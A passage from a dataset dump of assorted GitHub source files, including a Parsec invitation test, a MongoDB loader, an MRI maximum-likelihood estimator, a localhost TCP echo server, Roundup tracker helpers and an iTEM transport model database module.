BackendEvent.USER_CLAIMED,\n organization_id=mallory.organization_id,\n user_id=mallory.user_id,\n encrypted_claim=b\"\",\n )\n\n assert prep1[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n assert prep2[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n\n\n@pytest.mark.trio\nasync def test_user_invite_same_name_different_organizations(\n backend, apiv1_alice_backend_sock, apiv1_otheralice_backend_sock, alice, otheralice, mallory\n):\n # Mallory invitation from first organization\n with backend.event_bus.listen() as spy, trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep:\n\n # Waiting for user.claimed event\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=alice.organization_id,\n user_id=\"foo\",\n encrypted_claim=b\"\",\n )\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=alice.organization_id,\n user_id=mallory.user_id,\n encrypted_claim=b\"\",\n )\n\n assert prep[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n\n # Mallory invitation from second organization\n with backend.event_bus.listen() as spy, trio.fail_after(1):\n async with user_invite(apiv1_otheralice_backend_sock, user_id=mallory.user_id) as prep:\n\n # Waiting for user.claimed event\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=otheralice.organization_id,\n user_id=\"foo\",\n encrypted_claim=b\"\",\n )\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=otheralice.organization_id,\n user_id=mallory.user_id,\n encrypted_claim=b\"\",\n )\n\n assert prep[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n","repo_name":"groumage/Parsec-TowardAMoreSecureCloud","sub_path":"tests/backend/user/test_apiv1_user_invite.py","file_name":"test_apiv1_user_invite.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7237656103","text":"from pymongo import MongoClient\nmongo_client = MongoClient()\nimport json\nimport os\n\nprint(mongo_client.list_database_names())\n\n\nmydb = mongo_client[\"hw2\"]\nfactbook = mydb[\"factbook\"]\n\ncurr_dir = os.getcwd()\n\njson_dir = os.path.join(curr_dir, \"all_.jsons/\")\n\nprint(json_dir)\n\nfor filename in os.listdir(json_dir):\n #Obtain File Path.\n file_path = os.path.join(json_dir, filename)\n with open(file_path, \"r\") as f:\n json_data = f.read()\n print(\"N E X T D A T A >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> I N :%s\" %filename)\n # print(json_data)\n # convert into dict.\n dict_data = json.loads(json_data)\n # print(dict_data)\n _id = factbook.insert_one(dict_data)\n print(_id)\n\n\n","repo_name":"josueisonfire/hw2","sub_path":"populator.py","file_name":"populator.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41037172647","text":"import numpy as np\nimport pandas as pd\n\nnew_case = 5\nLayer = 1\n\ndom = np.load('case1/2.5_dom.npy')\na_ele = np.load('case1/a_ele.npy')\nv_ele = np.load('case1/v_ele.npy')\n\na_db = pd.read_csv('case1/2.5_a_db.csv')\nv_db = pd.read_csv('case1/2.5_v_db.csv')\n\na_ele_2 = np.copy(a_ele)\nv_ele_2 = np.copy(v_ele)\n\ndom_2 = 
np.copy(dom)\nnx, ny, nz = np.shape(dom_2)\n\na_pt = pd.read_csv('case1/2.5_a_pts.csv')\nv_pt = pd.read_csv('case1/2.5_v_pts.csv')\n\n\n\nmin_outlet_index = 2**Layer\nmax_outlet_index = min_outlet_index + 2**Layer\n\nmin_branch_ele = max_outlet_index - 2\nmax_branch_ele = 62 # min_branch_ele + 2**(Layer+1)\n\nfor k in range(nz):\n for j in range(ny):\n for i in range(nx):\n if(a_ele_2[i,j,k] > min_branch_ele and a_ele_2[i,j,k] <= max_branch_ele):\n a_ele_2[i,j,k] = -1\n dom_2[i,j,k] = 0\n if(v_ele_2[i,j,k] > min_branch_ele and v_ele_2[i,j,k] <= max_branch_ele):\n v_ele_2[i,j,k] = -1\n dom_2[i,j,k] = 0\n\nc_dom = np.zeros((nx,ny,nz), dtype = int)\n\ncount = 0\nfor k in range(nz):\n for j in range(ny):\n for i in range(nx):\n if(dom_2[i,j,k] == 0):\n c_dom[i,j,k] = count\n count = count + 1\n\n\na_pt_2 = a_pt.iloc[:max_outlet_index,:]\nv_pt_2 = v_pt.iloc[:max_outlet_index,:]\n\na_out = a_pt_2.iloc[min_outlet_index:,:]\nv_out = v_pt_2.iloc[min_outlet_index:,:]\n\na_db_2 = a_db.iloc[:min_branch_ele+1,:]\nv_db_2 = v_db.iloc[:min_branch_ele+1,:]\n\n\n\nmax_branch_ele = min_branch_ele + 2**(Layer+1)\n\nun_t = np.max(c_dom) + 1\nprint('Layer = ', Layer)\nprint('un_t = ', un_t)\nprint('Branch Element Removed = ', min_branch_ele+1, max_branch_ele)\nprint('Range of Outlets = ', min_outlet_index, max_outlet_index-1)\n \n\n\nnp.save('case'+str(new_case)+'/a_ele.npy',a_ele_2)\nnp.save('case'+str(new_case)+'/v_ele.npy',v_ele_2)\n\nnp.save('case'+str(new_case)+'/2.5_dom.npy', dom_2)\nnp.save('case'+str(new_case)+'/2.5_cdom.npy',c_dom)\n\na_pt_2.to_csv('case'+str(new_case)+'/2.5_a_pts.csv', index=False)\nv_pt_2.to_csv('case'+str(new_case)+'/2.5_v_pts.csv', index=False)\na_out.to_csv('case'+str(new_case)+'/2.5_a_out_pts.csv', index=False)\nv_out.to_csv('case'+str(new_case)+'/2.5_v_out_pts.csv', index=False)\na_db_2.to_csv('case'+str(new_case)+'/2.5_a_db.csv', index=False)\nv_db_2.to_csv('case'+str(new_case)+'/2.5_v_db.csv', index=False)\n\n","repo_name":"amarerohan/PressureDropParameterAnalysis","sub_path":"createCase2_from_Case1.py","file_name":"createCase2_from_Case1.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19177912433","text":"import numpy as np\nfrom estimate.Bloch import *\n# from Bloch import *\n\ndebug = 0\n\nif debug:\n np.set_printoptions(precision=6, suppress=True)\n TE_vals = np.array([0.01, 0.03, 0.04, 0.01])\n TR_vals = np.array([0.6, 0.6, 1, 0.8])\n # print(Bloch(np.array([1.4, 0.4, 0.005]), 0.4, 0.35))\n # print(Bloch(np.array([145.4, 0.2, 0.005]), TE_vals, TR_vals))\n\n # i = 1\n train_im = np.array([62.116354, 55.622071, 67.995199, 72.626893])\n # W_i = np.array([106.0 , 0.2, 0.004]) ## Best LS value\n W_i = np.array([56.0 , 0.1, 0.001])\n # print( sum( (Bloch(W_i, TE_vals, TR_vals) - train_im) ** 2) )\n sigma_train = np.array([1.3, 1.1, 1.5, 1.1])\n\n\nfrom math import exp, log\nfrom scipy.special import i0, i0e\n\ndef obj_fn(W_i, TE_vec, TR_vec, train_i, sigma):\n m = train_i.size\n pred = Bloch(W_i, TE_vec, TR_vec)\n likeli_sum = 0\n for j in range(m):\n tmp2 = train_i[j]/(sigma[j] ** 2)\n tmp3 = (train_i[j] ** 2 + pred[j] ** 2)/(2 * (sigma[j] ** 2))\n # tmp1 = log(i0(tmp2*pred[j])); ## Possibly creating bugs\n tmp1 = log(i0e(tmp2*pred[j])) + abs(tmp2*pred[j]); ## i0e(x) = exp(-abs(x)) * i0(x) => log(i0e(x)) = -abs(x) + log(i0(x))\n likeli_sum = likeli_sum + (log(tmp2) + tmp1 - tmp3); ## BUG - there is already a half here, also, abs() was not included before (Though it's 
obvious)\n \n return (-likeli_sum) \n\n## There was a BUG - no minus sign in likelihood (negative log likelihood) - CHECK TODO\n\n\n\n\nif debug:\n print('\\n\\nFirst value\\n')\n print(W_i)\n print(obj_fn(W_i, TE_vals, TR_vals, train_im, sigma_train))\n # print(train_im.shape)\n\n\n\nfrom scipy.optimize import minimize\n\nif debug:\n x0 = W_i\n # bnds = ((0, 450), (0, 1), (0, 1))\n bnds = ((0, 450), (1e-16, 0.77), (0, 0.006))\n additional = (TE_vals, TR_vals, train_im, sigma_train)\n abc = minimize(obj_fn, x0, args=additional, method='L-BFGS-B', bounds = bnds)\n # print(abc)\n print('\\nSecond value\\n')\n print(abc.x)\n print('\\nFirst obj fn value\\n')\n print(obj_fn(x0, TE_vals, TR_vals, train_im, sigma_train))\n print('\\nSecond obj fn value\\n')\n print(obj_fn(abc.x, TE_vals, TR_vals, train_im, sigma_train))\n\n\n\ndef MLE_est(W_init, TE_vec, TR_vec, train_mat, TE_scale, TR_scale, sigma_train, mask):\n bnds = ((0.0001, 450), (exp(-1/(0.01*TR_scale)), exp(-1/(4*TR_scale))), (exp(-1/(0.001*TE_scale)), exp(-1/(0.2*TE_scale))))\n print(bnds)\n\n n, m = train_mat.shape\n print(n)\n W = W_init\n for i in range(n):\n if i % 10000 == 0:\n print(i)\n if mask[i] == 0:\n additional = (TE_vec, TR_vec, train_mat[i], sigma_train)\n x0 = W_init[i]\n abc = minimize(obj_fn, x0, args=additional, method='L-BFGS-B', bounds = bnds)\n W[i,] = abc.x\n \n return W\n\n\n\n\nfrom joblib import Parallel, delayed\n\ndef MLE_est_i(i, W_init, TE_vec, TR_vec, train_mat, bnds, sigma_train, mask):\n if i % 10000 == 0:\n print(i)\n if mask[i] == 0:\n additional = (TE_vec, TR_vec, train_mat[i], sigma_train)\n x0 = W_init[i]\n abc = minimize(obj_fn, x0, args=additional, method='L-BFGS-B', bounds = bnds)\n return abc.x\n else:\n return W_init[i]\n\n\ndef MLE_est_par(W_init, TE_vec, TR_vec, train_mat, TE_scale, TR_scale, sigma_train, mask):\n bnds = ((0.0001, 450), (exp(-1/(0.01*TR_scale)), exp(-1/(4*TR_scale))), (exp(-1/(0.001*TE_scale)), exp(-1/(0.2*TE_scale))))\n x0 = np.array([np.mean(train_mat[0]), exp(-1/(2*TR_scale)), exp(-1/(0.1*TE_scale))])\n\n n, m = train_mat.shape\n print(n)\n W = W_init\n \n W = Parallel(n_jobs=2)(\n delayed(MLE_est_i)(i, W_init, TE_vec, TR_vec, train_mat, bnds, sigma_train, mask) for i in range(n))\n return W\n\n\n","repo_name":"StatPal/DeepSynMRI","sub_path":"estimate/MLE.py","file_name":"MLE.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29867498990","text":"#https://leetcode.com/problems/house-robber/\nclass Solution:\n # @param A : list of list of integers\n # @return an integer\n def adjacent(self, A):\n odd = 0\n even = 0\n\n result = [0 ] *len(A[0])\n\n result[0] = max(A[0][0], A[1][0])\n\n\n for i in range(1 ,len(A[0])):\n if i > 1:\n result[i] = max( max(A[1][i], A[0][i]) +result[i - 2], result[i - 1])\n\n else:\n result[i] = max(max(A[1][i], A[0][i]), result[i - 1])\n\n return result[-1]","repo_name":"shawnchriston/leetCodeSolutionsPython","sub_path":"DynamicProgramming/leetcode198.py","file_name":"leetcode198.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22207487267","text":"from yt_concate.models.found import Found\nfrom .step import Step\n\n\nclass Search(Step):\n def process(self, utils, inputs, data):\n found = []\n search_word = inputs['search_word']\n\n for yt in data:\n if not yt.check_caption_file_exists():\n continue\n captions = yt.captions\n for caption 
in yt.captions:\n if search_word in caption:\n time = captions[caption]\n f = Found(yt, caption, time)\n found.append(f)\n for obj in found:\n print(obj.yt, obj.caption, obj.time)\n return found\n","repo_name":"suhunlin/yt-concate-command-line0722","sub_path":"yt_concate/pipeline/steps/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8192899310","text":"# build Socket of server\n\nimport socket\n\n\ndef mainRun():\n # ทำการทดสอบ program ผ่านเครืองเรา host กำหนดผ่าน host\n host=\"127.0.0.1\" #ip local host\n port=5000\n # สร้าง object ของ socket เพื่อใช้รับส่งข้อมูล\n server=socket.socket()\n # ทำการผูก(bind) object socket ไว้กับ host\n server.bind((host,port))\n # กำหนดจำนวน client\n server.listen(1)\n print(\"Waiting to connect from Client:\")\n\n # สร้าง object 2 ตัว เมื่อมีการเครื่องต่อ (accept) กับ client แล้วจะเก็บค่าไว้ใน object ทั้ง 2\n client,addr=server.accept()\n # print บอก สถานะ\n print(\"Connect From :\"+ str(addr))\n\n\n # กระบวนการรับส่งข้อมูลระหว่างเครื่อง \n while True: # ทำการรับส่งข้อมูลไปเรื่อยๆ\n # ข้อมูลที่รับส่งเป็นข้อมูลแบบ byte\n # รับข้อมูลจาก client\n data=client.recv(1024).decode('utf-8') \n # รับข้อมูล 1024 ตัวอักษร (1024 byte = 1kbyte) # decode แปลง byte เป็น string\n # client ส่งข้อมูลมาจะถูกเก็บไว้ในตัวแปร string\n\n if not data:\n break # ถ้าไม่มี data ให้ออกจาก loop\n \n print(\"Message From Client : \"+data)\n\n # ส่งข้อมูลไปหา Client\n data=str(data.upper()) # ถ้า client ส่งข้อมูลเป็นตัวพิมพ์เล็ก จะแปลงเป็นตัวพิมพ์ใหญ่และส่งไปให้ client\n client.send(data.encode('utf-8')) # ข้อมูลที่ส่งมีการแปลงจาก string เป็น byte\n\n client.close() # สั่ง client ให้ปิด\n\n\n\nif __name__==\"__main__\":\n mainRun()\n","repo_name":"parinyad123/Python-Network","sub_path":"TCP_IP/TCPServer.py","file_name":"TCPServer.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36221402833","text":"import re\nimport random\nfrom roundup.cgi.actions import Action\nfrom roundup.cgi.exceptions import Redirect\n\n\ndef is_history_ok(request):\n user = request.client.userid\n db = request.client.db\n classname = request.classname\n nodeid = request.nodeid\n # restrict display of user history to user itself only\n if classname == 'user':\n return user == nodeid or 'Coordinator' in db.user.get(user, 'roles')\n # currently not used\n return True\n\ndef is_coordinator(request):\n user = request.client.userid\n db = request.client.db\n return 'Coordinator' in db.user.get(user, 'roles')\n\ndef clean_ok_message(ok_message):\n \"\"\"Remove nosy_count and message_count from the ok_message.\"\"\"\n pattern = '\\s*(?:nosy|message)_count,|,\\s*(?:nosy|message)_count(?= edited)'\n return ''.join(re.sub(pattern, '', line) for line in ok_message) + '
    '\n\n\ndef issueid_and_action_from_class(cls):\n \"\"\"\n Return the id of the issue where the msg/file is/was linked\n and if the last \"linking action\" was 'link' or 'unlink'.\n \"\"\"\n last_action = ''\n for entry in cls._klass.history(cls._nodeid):\n if 'unlink' in entry:\n last_unlink = entry\n last_action = 'unlink'\n elif 'link' in entry:\n last_entry = entry\n last_action = 'link'\n if last_action in ('link', 'unlink'):\n # the msg has been unlinked and not linked back\n # the link looks like: ('16', , '4',\n # 'link', ('issue', '1', 'messages'))\n return last_entry[4][1], last_action\n return None, None\n\n\nclass RandomIssueAction(Action):\n def handle(self):\n \"\"\"Redirect to a random open issue.\"\"\"\n issue = self.context['context']\n # use issue._klass to get a list of ids, and not a list of instances\n issue_ids = issue._klass.filter(None, {'status': 1})\n url = self.db.config.TRACKER_WEB + 'issue' + random.choice(issue_ids)\n raise Redirect(url)\n\n\ndef init(instance):\n instance.registerUtil('is_history_ok', is_history_ok)\n instance.registerUtil('is_coordinator', is_coordinator)\n instance.registerUtil('clean_ok_message', clean_ok_message)\n instance.registerUtil('issueid_and_action_from_class',\n issueid_and_action_from_class)\n instance.registerAction('random', RandomIssueAction)\n","repo_name":"rbtcollins/tracker-python-dev","sub_path":"extensions/pydevutils.py","file_name":"pydevutils.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32807620612","text":"\n# 입력값\nn = str(input())\nnum = len(n)\nm = int(n)\n\na = num // 2\nhap_0 = 0\nhap_1 = 0\n\nfor i in range(0, a) :\n hap_0 += int(n[i])\n\nfor j in range(a, num) :\n hap_1 += int(n[j])\n\nif hap_0 == hap_1 :\n print(\"LUCKY\")\nelse :\n print(\"READY\")","repo_name":"uss96/CodingTest","sub_path":"삼전코테/구현/럭키 스트레이트.py","file_name":"럭키 스트레이트.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26026058045","text":"from __future__ import annotations\nimport typing as t\n\nfrom sqlalchemy import delete, select\n\nfrom ..confirmation_token import (\n ConfirmationToken as _ConfirmationToken,\n ConfirmationTokenSerializer as _ConfirmationTokenSerializer,\n TokenProtocol,\n)\nfrom ..decorators import getattr_or_implement\nfrom .session import sqla_session\n\n\n__all__ = (\n 'ConfirmationToken',\n 'ConfirmationTokenSerializer',\n)\n\n\nclass SQLATokenMixin:\n model_class: t.Type[t.Any]\n\n def delete_user_tokens(self, user: t.Any) -> None:\n model = self.get_model_class()\n self.session.execute(\n delete(model).where(model.user == user)\n )\n\n def find_token(self, value: str) -> t.Optional[TokenProtocol]:\n model = self.get_model_class()\n return self.session.scalar(\n select(model).where(model.value == value)\n )\n\n def find_user_tokens(self, user: t.Any) -> t.Sequence[TokenProtocol]:\n model = self.get_model_class()\n return self.session.scalars(\n select(model).where(model.user == user)\n .with_for_update()\n ).all()\n\n @getattr_or_implement\n def get_model_class(self) -> t.Type[t.Any]:\n return self.model_class\n\n def save_token(self, token_dict: t.Dict[str, t.Any]) -> None:\n token = self.get_model_class()(**token_dict)\n self.session.add(token)\n\n @property\n def session(self):\n return sqla_session\n\n\nclass ConfirmationToken(SQLATokenMixin, _ConfirmationToken):\n pass\n\n\nclass 
ConfirmationTokenSerializer(SQLATokenMixin, _ConfirmationTokenSerializer):\n pass\n","repo_name":"kyzima-spb/flask-useful","sub_path":"src/flask_useful/sqla/confirmation_token.py","file_name":"confirmation_token.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199505882","text":"import errno\nimport os\nimport pickle\nfrom importlib import import_module\nfrom os import makedirs\nfrom os.path import join\nfrom typing import Dict\n\nimport pandas as pd\nimport pycountry\nimport xarray as xr\nimport yaml\n\nfrom item.common import log, paths\nfrom item.model.common import as_xarray, concat_versions, select, tidy, to_wide\nfrom item.model.dimensions import INDEX, load_template\n\n__all__ = [\n \"concat_versions\",\n \"coverage\",\n \"get_model_info\",\n \"load_model_data\",\n \"load_model_scenarios\",\n \"make_regions_csv\",\n \"make_regions_yaml\",\n \"select\",\n \"squash_scenarios\",\n \"to_wide\",\n]\n\n\n# Versions of the database\nVERSIONS = [1, 2]\n\n# Information about the models\nMODELS: Dict[str, dict] = {}\n\n\ndef coverage(models):\n \"\"\"Display some basic data coverage information.\"\"\"\n\n log(\"Checking data coverage.\\n\")\n\n # Accumulate a list of xr.DataArrays to later concatenate@\n result = []\n\n # Load the list of requested quantities\n qty = load_template(paths[\"model data\"])\n\n # Find True/not-null values and sum to get the number of requested\n # quantities for each variable\n req = qty.notnull().sum([\"Mode\", \"Technology\", \"Fuel\"]).to_array(name=\"Requested\")\n log(\"Quantities requested in reporting template: %d\\n\", req.sum())\n result.append((req, \"Requested\"))\n\n # Iterate through models\n for name in sorted(models.keys()):\n if name == \"itf\" or name == \"exxonmobil\" or name == \"roadmap\":\n # Skip due to a data issue\n continue\n log(\"Loading data for %s\" % name)\n\n # Load model data\n df = pd.read_csv(os.path.join(paths[\"model data\"], \"model\", name, \"data.csv\"))\n log(df.head())\n\n # Convert to an xr.Dataset, then count non-null values. 
We consider a\n # series populated if it has a data value for *any* scenario, region\n # and year.\n counts = (\n as_xarray(df)\n .notnull()\n .any([\"Scenario\", \"Region\", \"Year\"])\n .sum([\"Mode\", \"Technology\", \"Fuel\"])\n .to_array()\n )\n result.append((counts, name))\n\n # Make two separate lists of the DataArrays and labels\n data, labels = zip(*result)\n\n # Combine to a single Dataset\n df = (\n xr.concat(data, pd.Index(labels, name=\"model\"))\n .fillna(0)\n .to_dataframe()\n .unstack(\"model\")\n )\n\n # Compute some totals\n df.columns = df.columns.droplevel(0)\n df[\"# of models\"] = (df.loc[:, \"bp\":] > 0).sum(axis=\"columns\")\n df.loc[\"Total\", :] = df.sum(axis=\"rows\")\n df = df.astype(int)\n log(df)\n df.to_csv(os.path.join(paths[\"model data\"], \"output\", \"coverage.csv\"))\n\n\ndef get_model_info(name, version):\n load_models_info()\n\n try:\n model_info = MODELS[name]\n if version in model_info[\"versions\"]:\n return model_info\n else:\n raise ValueError(\n \"model '{}' not present in database version {}\".format(name, version)\n )\n except KeyError:\n raise ValueError(f\"Model {repr(name)} not among {MODELS.keys()}\")\n\n\ndef get_model_names(version=VERSIONS[-1]):\n \"\"\"Return the names of all models in *version*.\"\"\"\n load_models_info()\n\n result = []\n for name, info in MODELS.items():\n if version in info[\"versions\"]:\n result.append(name)\n return result\n\n\ndef process_raw(version, models):\n \"\"\"Process raw data submissions.\n\n Data for MODELS are imported from the raw data directory.\n \"\"\"\n # Process arguments\n models = models if len(models) else get_model_names(version)\n\n log(\"Processing raw data for: {}\".format(\" \".join(models)))\n\n class _csv_model:\n def import_data(self, data_path, metadata_path):\n return pd.read_csv(data_path), None\n\n for name in models:\n try:\n info = get_model_info(name, version)\n except KeyError:\n log(\" unknown model '%s', skipping\" % name)\n continue\n\n if info[\"format\"] == \"csv\":\n model = _csv_model()\n elif info[\"format\"] is None:\n log(\" model '{}' needs no import\".format(name))\n continue\n else:\n model = import_module(\"item.model.%s\" % name)\n\n _process_raw(name, model, version, info)\n\n\ndef _process_raw(name, model, version, info):\n log(\"Processing raw data for {}\".format(name))\n # Path to raw data: this hold the contents of the Dropbox folder\n # 'ITEM2/Scenario_data_for_comparison/Data_submission_1/Raw_data'\n raw_data = join(\n paths[\"model raw\"], str(version), \"{}.{}\".format(name, info[\"format\"])\n )\n metadata = join(paths[\"data\"], \"model\", name)\n\n log(\" raw data: {}\\n metadata: {}\".format(raw_data, metadata))\n\n # Load the data\n data, notes = model.import_data(raw_data, metadata)\n\n # Put columns in a canonical order\n data = tidy(data)\n\n # Log some diagnostic information\n iy = list(set(data.columns) - set(INDEX))\n log(\" %d non-zero values beginning %s\", data.loc[:, iy].notnull().sum().sum(), iy)\n\n # Create a subdirectory under item2-data/model, if it does not already\n # exist\n model_dir = join(paths[\"model processed\"], str(version), name)\n makedirs(model_dir, exist_ok=True)\n\n # TODO log the last-changed date of the file used for import, or a\n # checksum\n\n # Write data\n data.to_csv(\n join(paths[\"model processed\"], str(version), \"%s.csv\" % name), index=False\n )\n\n # Write the region list for this model\n pd.Series(data[\"region\"].unique(), name=\"region\").to_csv(\n join(model_dir, \"region.csv\"), index=False\n 
)\n\n # Write the model comments\n try:\n notes.to_csv(join(model_dir, \"note.csv\"), index=False)\n except AttributeError:\n # notes == None; no comments provided for this data set\n pass\n\n\ndef load_model_data(\n version, skip_cache=False, cache=True, fmt=pd.DataFrame, options=[]\n):\n \"\"\"Load model database\"\"\"\n # Check arguments\n version = int(version)\n\n try:\n path = paths[\"models-%d\" % version]\n except KeyError:\n raise ValueError(\"invalid model database version: %s\" % version)\n\n if fmt not in [pd.DataFrame, xr.DataArray, xr.Dataset]:\n raise ValueError(\"unknown return format: %s\" % fmt)\n\n # Path for cached data\n cache_path = os.path.join(paths[\"cache\"], \"model-%d.pkl\" % version)\n\n data = None\n\n # Read data from cache\n if not skip_cache:\n try:\n with open(cache_path, \"rb\") as f:\n data = pickle.load(f)\n except OSError as e:\n if e.errno == errno.ENOENT: # No such file or directory\n pass\n\n # Read data from file\n if data is None:\n data = tidy(pd.read_csv(path))\n\n # Convert to long format, drop empty rows\n data = pd.melt(data, id_vars=INDEX, var_name=\"year\").dropna(subset=[\"value\"])\n\n # Cache the result\n if cache:\n with open(cache_path, \"wb\") as f:\n pickle.dump(data, f)\n\n # Optional additional processing\n if \"squash scenarios\" in options:\n data = squash_scenarios(data, version)\n options.remove(\"squash scenarios\")\n\n if len(options):\n raise ValueError\n\n if fmt in [xr.Dataset, xr.DataArray]:\n # Convert to an xarray format\n return as_xarray(data, version, fmt)\n else:\n # return as-is\n return data\n\n\ndef load_models_info():\n \"\"\"Load the models metadata into the MODELS global.\"\"\"\n global MODELS\n\n if len(MODELS) > 0:\n # Already loaded\n return\n\n with open(join(paths[\"data\"], \"model\", \"models.yaml\")) as f:\n MODELS = yaml.safe_load(f)\n\n\ndef load_model_regions(name, version):\n \"\"\"Load regions.yaml for model *name* in database *version*.\n\n Returns a dictionary where:\n - Keys are codes or names of model regions.\n - Values are dictionaries with the keys:\n - description (optional): a longer name or description of the region\n - countries: a list of ISO 3166 alpha-3 codes for countries in the\n region.\n \"\"\"\n # IDEA load from either regions-1.yaml or regions-2.yaml\n try:\n get_model_info(name, version)\n except Exception:\n if name.lower() == \"item\":\n # Use an empty path in the join() call below; this causes the\n # overall regions.yaml to be loaded\n name = \"\"\n else:\n raise\n\n with open(join(paths[\"data\"], \"model\", name, \"regions.yaml\")) as f:\n return yaml.safe_load(f)\n\n\ndef load_model_scenarios(name, version):\n \"\"\"Load scenarios.yaml for model *name* in database *version*.\n\n Returns a dictionay where:\n\n - Keys are codes or names of scenarios.\n - Values are dictionaries with the key:\n\n - ``category``: either 'reference' or 'policy'.\n \"\"\"\n # Don't do anything with the return value; just check arguments\n get_model_info(name, version)\n\n with open(join(paths[\"data\"], \"model\", name, \"scenarios.yaml\")) as f:\n return yaml.safe_load(f)[version]\n\n\ndef make_regions_csv(out_file, models=None, compare=None):\n \"\"\"Produce a CSV *out_file* with a country→region map for *models*.\n\n The table is created by parsing the regions.yaml files in the iTEM model\n database metadata. 
It is indexed by ISO 3166 (alpha-3) codes, and has one\n column for each model in *models* (if no models are specified, all models\n are included).\n\n If *compare* is given, the table has entries only where the generated\n value and\n \"\"\"\n version = VERSIONS[-1] # Version 2 only\n\n models = models or get_model_names(version)\n\n def _load(name):\n def _invert(data):\n result = {}\n for k, v in data.items():\n result.update({c: k for c in v[\"countries\"]})\n return result\n\n return pd.Series(\n _invert(load_model_regions(name, version)),\n name=name if len(name) else \"item\",\n )\n\n result = pd.concat([_load(model) for model in [\"item\"] + models], axis=1)\n\n def _get_name(row):\n error = None\n try:\n name = pycountry.countries.get(alpha_3=row.name).name\n except AttributeError:\n try:\n name = pycountry.historic_countries.get(alpha_3=row.name).name\n error = \"historical\"\n except AttributeError:\n name = \"\"\n error = \"nonexistent\"\n finally:\n print(\n \"{} ISO 3166 code '{}' in models: {}\".format(\n error, row.name, \", \".join(row.dropna().index)\n )\n )\n return name\n\n result[\"name\"] = result.apply(_get_name, axis=1)\n\n if compare is not None:\n other = pd.read_csv(compare)\n other.columns = map(str.lower, other.columns)\n other.set_index(\"iso\", inplace=True)\n other.index = map(str.upper, other.index)\n\n result = result.where(result.ne(other))\n\n with open(out_file, \"w\") as f:\n result.to_csv(f)\n\n\ndef make_regions_yaml(in_file, country, region, out_file):\n \"\"\"Convert a country→region map from CSV *in_file* to YAML *out_file*.\n\n *country* and *region* are columns in *in_file* with country codes and\n region names, respectively.\n \"\"\"\n data = pd.read_csv(in_file)[[region, country]].sort_values([region, country])\n data[country] = data[country].apply(str.upper)\n\n result = {}\n\n for region, group in data.groupby(region):\n result[region] = dict(description=\"\", countries=list(group[country]))\n\n with open(out_file, \"w\") as f:\n yaml.dump(result, f, default_flow_style=False)\n\n\ndef squash_scenarios(data, version):\n \"\"\"Replace the per-model scenario names with scenario categories.\n\n *data* is a pd.DataFrame. 
*version* is the version of the iTEM model\n database.\n \"\"\"\n # Construct the map from model metadata\n scenarios_map = {}\n for model in get_model_names(version):\n for s, info in load_model_scenarios(model, version).items():\n scenarios_map[s] = info[\"category\"]\n\n return data.replace({\"scenario\": scenarios_map})\n","repo_name":"transportenergy/database","sub_path":"item/model/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12155,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"20500391856","text":"import numpy as np\nimport torch.onnx\nimport subprocess\n\n\n\ndef export_to_ONNX(model):\n # Create model with feature dimension 10\n\n D = r\"MCU_NN.onnx\"\n x =torch.randn(1, 32*32)\n print(x)\n print(x.shape)\n print(\"Output:\")\n print(model.target_net(x,torch.tensor([0])))\n input_names = [ \"image\" ]\n output_names = [ \"action\" ]\n\n torch.onnx.export(model.target_net,\n (x, torch.tensor([0])),\n D,\n export_params=True,\n opset_version=10,\n do_constant_folding=True,\n verbose=True,\n input_names=input_names,\n output_names=output_names)\n\n \"\"\"Converting model using xcube.ai\"\"\"\n # This step requires xcube.ai to be installed\n xcubeai_outdir = \"model\"\n xcubeai_exepath = r\"D:\\\\University\\\\AVG-Önlab\\\\stm32ai-windows-6.0.0\\\\windows\\\\stm32ai.exe\"\n\n args = xcubeai_exepath + \" generate \" + \"-m \" + D + \" -o \" + xcubeai_outdir + \" --type onnx\" + \" --compression 8\" + \" --name simplenn\" + \" --series stm32f7\"\n subprocess.call(args, 